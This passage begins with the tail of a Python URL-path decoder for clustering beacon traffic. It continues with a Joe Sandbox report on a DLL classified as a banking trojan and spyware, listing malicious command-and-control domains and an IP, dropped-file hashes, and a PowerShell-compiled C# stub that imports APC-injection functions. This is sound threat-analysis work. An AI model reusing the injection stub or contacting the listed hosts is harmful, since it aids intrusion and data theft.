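        raise ValueError("segment lengths must be positive")
    text = base64.b64encode(payload).decode("ascii")
    for token, char in TOKENS.items():
        text = text.replace(char, token)
    parts: List[str] = []
    i = 0
    while i < len(text):
        step = lengths[len(parts) % len(lengths)]
        parts.append(text[i:i + step])
        i += step
    return "/" + "/".join(parts)


# Constructed sample: payload chosen so its base64 contains '+', '/' and '=' ("++++aGVsbG8gd29ybGT///8=").
SAMPLE_PAYLOAD = b"\xfb\xef\xbe" + b"hello world" + b"\xff\xff\xff"
# Hand-split so that a '/' lands inside a token ("_2/B" and "_2/F"), as in the report's URLs.
SAMPLE_URL = "http://example.invalid/_2B_2B_2/B_2BaGVsbG8g/d29ybGT_2F_2F_2/F8_2D"


if __name__ == "__main__":
    print(normalize_path(SAMPLE_URL))
    print(decode_path(SAMPLE_URL))
    print(encode_path(SAMPLE_PAYLOAD, [7, 11, 5]))
```

Because the separator is stripped before the tokens are replaced, the order of operations is what makes the split-token URLs on this page decode; a naive "replace `_2F` then split on `/`" pass leaves `_2` and `F` fragments behind and the base64 step fails. The same normalization applied to the report's own URLs only yields ciphertext, so it is useful for clustering and for writing proxy rules on the token pattern, not for reading the beacon.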

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
myip.opendns.com | 102.129.143.57 | true | false | | high
resolver1.opendns.com | 208.67.222.222 | true | false | | high
init.icecreambob.com | 194.147.86.221 | true | true | | unknown
art.microsoftsofymicrosoftsoft.at | 194.147.86.221 | true | true | | unknown
222.222.67.208.in-addr.arpa | unknown | unknown | true | | unknown

                          Contacted URLs


                          URLs from Memory and Binaries


                                                        Contacted IPs


                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.147.86.221 | init.icecreambob.com | Russian Federation | 61400 | NETRACK-ASRU | true

                                                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 498359
Start date: 07.10.2021
Start time: 01:30:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: data.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.3% (good quality ratio 26.4%)
• Quality average: 80.7%
• Quality standard deviation: 27.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 20.50.102.62, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60
• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

Time | Type | Description
01:32:09 | API Interceptor | 4x Sleep call for process: loaddll32.exe modified
01:32:19 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
01:32:30 | API Interceptor | 84x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

Match | Associated Sample Name / URL | Detection
194.147.86.221 | 2u2mgtylJy.dll | malicious

                                                          Domains


                                                          ASN


                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.8910535897909355
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                          MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                          SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                          SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                          SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1192
                                                          Entropy (8bit):5.325275554903011
                                                          Encrypted:false
                                                          SSDEEP:24:3aEPpQrLAo4KAxCoOu42B15qRPNnCvK39tOBPnKdirh:qEPerB4BOu/9qRVnCvO9tOBfuit
                                                          MD5:D9D42CC091BE79AB1496C649F5585767
                                                          SHA1:5E23D29ACD70EE17F01DA4AB54BE562E33CC7980
                                                          SHA-256:5C0BFCE56791BB95902AF0280D2DED2FB46EEA5899AB08CB4A0955ABE86F08EA
                                                          SHA-512:6B962EDA66C17B5F531F6370C3B4567AC0CD23EE2F140B9352C4C178115C7E54CA456644D200E888AFF1A67D038E9605C8557B272377E99C2358FB856C67CFE0
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\380E.bi1
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):11
                                                          Entropy (8bit):1.2776134368191157
                                                          Encrypted:false
                                                          SSDEEP:3:111Qv:Luv
                                                          MD5:5B3345909519932D6670D92F16496463
                                                          SHA1:6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
                                                          SHA-256:0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
                                                          SHA-512:B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
                                                          Malicious:false
                                                          Preview: -------- ..
                                                          C:\Users\user\AppData\Local\Temp\RES20A.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.707958824120458
                                                          Encrypted:false
                                                          SSDEEP:24:p+fpt6nfHuhKdNfI+ycuZhNbWakSyHPNnq9qp0e9Ep:cOfkKd91ulqa3+q9H
                                                          MD5:9F22A8320D7A071B76FDC69EC539ECCB
                                                          SHA1:14333BA5399DAD87A67A7C9A7AFEB8740FCFEECE
                                                          SHA-256:9394AC09F500EBF590CEF7AA960C5BA829D34107A3156FD9258CB42DB78240DB
                                                          SHA-512:615184C6FB055548483C213F1B47960804AED79DC425C4387446B496D2C6948196D17408F2013694B44711163F2881F878BBAAF2AE292EDDD0BFF10711287AC9
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\RES47B.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.7147512751024414
                                                          Encrypted:false
                                                          SSDEEP:24:p+fqnfHuhKdNfI+ycuZhNRakSfPNnq9qpxe9Ep:cqfkKd91ulRa39q9e
                                                          MD5:56C427E4F156501570F09F60C71B4FFC
                                                          SHA1:E95259B5A9D2A7D6985794796C7D50E44F2ED54E
                                                          SHA-256:0DF94A4553794E9745768309E3143BF27364A91D236F4B7B3078172745404A9D
                                                          SHA-512:4DF6DE36B39C6AE6F8ECD8ACC31EEB1659FB4C75981086D5BD9D89560F7D7EAE4EE946E0E07BEC9F8095F15BA16CAB2679D500EB40C959B0452B3482FCBA76F8
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\RESF604.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.704757091617058
                                                          Encrypted:false
                                                          SSDEEP:24:bZfF7LDfHvV0QhKdNNI+ycuZhNkqakS1bPNnq9qp1e9Ep:bBptdKd31ul3a37q9a
                                                          MD5:A19900A27924406D8B8C2B3967F7549E
                                                          SHA1:67086C00C8F2AD154A30F03F3B7B7FCC5CCA26AB
                                                          SHA-256:B10D3F322BEEB34F99285BE39628DEB06F88269B1C71D5AB201C1D4C873107B6
                                                          SHA-512:B24F2FA68DDBDDB024C3439363F240E98390EEC262BF791B83F9E032429B41F9610641EAD8BE66589E698765AE895B07D4CAD7324583854FBD7F363B7AB41818
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\RESF652.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.702279321283148
                                                          Encrypted:false
                                                          SSDEEP:24:p+fiijCDfHv6hKdNNI+ycuZhNxakSPPNnq9qp1e9Ep:ct44Kd31ulxa3Nq9a
                                                          MD5:68F64E91D72B2B0F972BCD7336F2A9CC
                                                          SHA1:2B4DA3BF145E15313E6796912E46193EC0CB0542
                                                          SHA-256:5AEBE77361A5E69CD2F4E5A7FD83CE17FEEFEFBC6C29E429A92471903DE78A00
                                                          SHA-512:7D6DD472E15D32B947CD7C7CC98073D00E05FAD1397E0B5BF4A00280DD0C9729F1B9783E8713C429AD221C12C1C76867E6EED624A266467D2C180868C97CF8A2
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1khnqhjk.loo.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psahr3sw.wpu.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tg4p345c.j2l.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1118070987658872
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuqak7Ynqq1bPN5Dlq5J:+RI+ycuZhNkqakS1bPNnqX
                                                          MD5:7C5651680CDC7C8F38DD72F6EFF7FCC1
                                                          SHA1:48F3B58D5CF23B80248D1220D2781699720AB0FC
                                                          SHA-256:5E443A37A5A1A69715E0C8D1C58A98CB0CEDAB7B9F9CF4F043FC43A37F4A2155
                                                          SHA-512:009D6016851CEC3F44A2664E385461C377E9179517BB89707B0C47093C358D583FD0E08367FF693CDC6B6B84DFF7F2E7D4DEBB4BAFB1003228945811C467985A
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.249748564356388
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftqhzxs7+AEszIwkn23ftqq9:p37Lvkmb6KRfFqhWZEifFqq9
                                                          MD5:1F903E4C6488F96BEFF8106212BB1FB8
                                                          SHA1:F83BA87CDA88445647CBC5287FEB88FB745303D9
                                                          SHA-256:9AE5B2762E43566A26D39530831229138A3DE4407243A22BF1CACA6DDC8C5EC1
                                                          SHA-512:72685413AF01FC6EFF547B0E3F7A18A2F3FA655FCF33566E7EA1368A9684DB674AFACD57FC30F1D010B54C0D1991A1CE1A079A0CBB84ADB231546E382457E871
                                                          Malicious:true
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.597551467700443
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpi94MatkZfltUaUI+ycuZhNkqakS1bPNnq:6XDWb5lxF1hJl61ul3a37q
                                                          MD5:C46F8C61C8CB705DF757CCCA39C5B679
                                                          SHA1:AF738C88BB2A7C2CF9D18F0A68179DCE724C13D7
                                                          SHA-256:DD862D783A4E8A31034B21655E7F80366CF2A745E821AB0E4D7EB0DD2749D3E2
                                                          SHA-512:9938809F33099A04070BC942239CF9C48B2F99CD2E7D77851939AEB1FA9A5DF6DCA46F7FF584E4183BC7ACEB2BFB7C88B3747ACE7ABC5A9481DA678590D01F9E
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0863679805822777
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBVak7Ynqq4aPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                          MD5:A84E3090E4FC8017918EF55DA63D009A
                                                          SHA1:E15976679755FDC7CC21F13701703C98E72E7187
                                                          SHA-256:6CD9F5821875D9A6795771EEC4553888DCAEED39D713D8AAFD886594B22CDAC3
                                                          SHA-512:0BCECD1BFFAA5F7AAF3C1A402AAFF92770676B19B91A2EF3F785FB58F2993B9BAC01A55B3E39AEF19B43928ED008D1C468A0518CAD499E2E3C24AE14128E28AE
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.22823213171567
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fx1CokCLGzxs7+AEszIwkn23fx1CokC:p37Lvkmb6KRfZ1jkHWZEifZ1jkC
                                                          MD5:FA407420BBC7FCEC54DFA5F57B2D7BFB
                                                          SHA1:5964FDCA13AB3C97EE75C4D5D15DEA6ED75A6FDC
                                                          SHA-256:E30540BE2C4911E47BBDF06B9F3DB165CD98DD7A4D77D028767C546DC3B50342
                                                          SHA-512:DE73CCC9D3540D976AA4E27DCA7ABA5D44DC8ABBA0810229DF904B1C52D51EA84AE908487E61E4C5E29B78546634DC52BBFFE3CE15052611093048A77A896307
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.590972462431772
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpiea4MatkZf28zaUI+ycuZhNxakSPPNnq:6XDWb5lxF11JVr1ulxa3Nq
                                                          MD5:2C829AD936178D4534050E2CF39B3F90
                                                          SHA1:5096E288CE9F5699BB3BB57930ED2B749692CA5B
                                                          SHA-256:E7ACFB204936BB5A36A6E11EC33A50BE09C01CF0104A556C03247B227F590B37
                                                          SHA-512:CD552B4F18D42DAB7B5E63FAE29715C3518CC9B26FB7DD08D12FFD1416585E734E650F8E5228C3E6F0115FC9A84BCE3ED9136A79CC2C2FBA204DF9E5B572EC0D
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.aixojixg.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1040997079419537
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRWak7YnqqyHPN5Dlq5J:+RI+ycuZhNbWakSyHPNnqX
                                                          MD5:9907C63C948829AE092C374047EE5A7F
                                                          SHA1:16272A7ED54545B9C5EB9DB21BAF114DBBEBA3F6
                                                          SHA-256:67EDC019440BEAB697297DA6152E19A52C0FE9B6E19A60C6CE235A60C7ECC9A4
                                                          SHA-512:B4D72964DF5A8CFC8CFAA248BD4F05F6C578EF47CEBFBD240AE15E3123088CE88CFFD212265D836A2B3EB6784762CDBDA5AEE08C13FC77F38C3807E61C6EAF16
                                                          Malicious:false
